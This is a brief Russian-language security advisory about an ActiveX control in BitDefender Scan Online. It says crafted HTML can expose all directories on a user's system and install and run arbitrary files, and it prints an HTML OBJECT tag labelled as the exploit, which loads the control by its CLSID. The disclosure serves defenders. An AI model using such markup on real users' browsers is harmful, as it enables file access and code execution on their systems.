Программа: BitDefender Scan Online 

Уязвимость обнаружена в SOFTWIN BitDefender Scan Online. Удаленный пользователь может установить и выполнить произвольные файлы на целевой системе пользователя.
BitDefender Scan Online устанавливает ActiveX компоненту с именем «AVXSCANONLINE.AvxScanOnlineCtrl.1» и CLSID
80DD2229-B8E4-4C77 -B72F-F22972D723EA, когда используется служба сканирования.
Удаленный пользователь может создать HTML, чтобы получить доступ к содержанию всех каталогов на системе и устанавливать и выполнять произвольные файлы на целевой системе пользователя. 

Эксплоит: 

<OBJECT id=seemycomputer codeBase=http://www.bitdefender.com/scan/ Msie/bitdefender.cab#version=3,0,0,
hspace=0 vspace=0 align="top" classid=CLSID:80DD2229-B8E4-
4C77-B72F-F22972D723EA width=405 height=180>
<PARAM NAME=»_ExtentX» VALUE=»6614″>
<PARAM NAME=»_ExtentY» VALUE=»4498″>
<PARAM NAME=»_StockProps» VALUE=»9″>
<PARAM NAME=»ForeColor» VALUE=»0″>
<PARAM NAME=»BackColor» VALUE="16777215">
</OBJECT>

Оставить мнение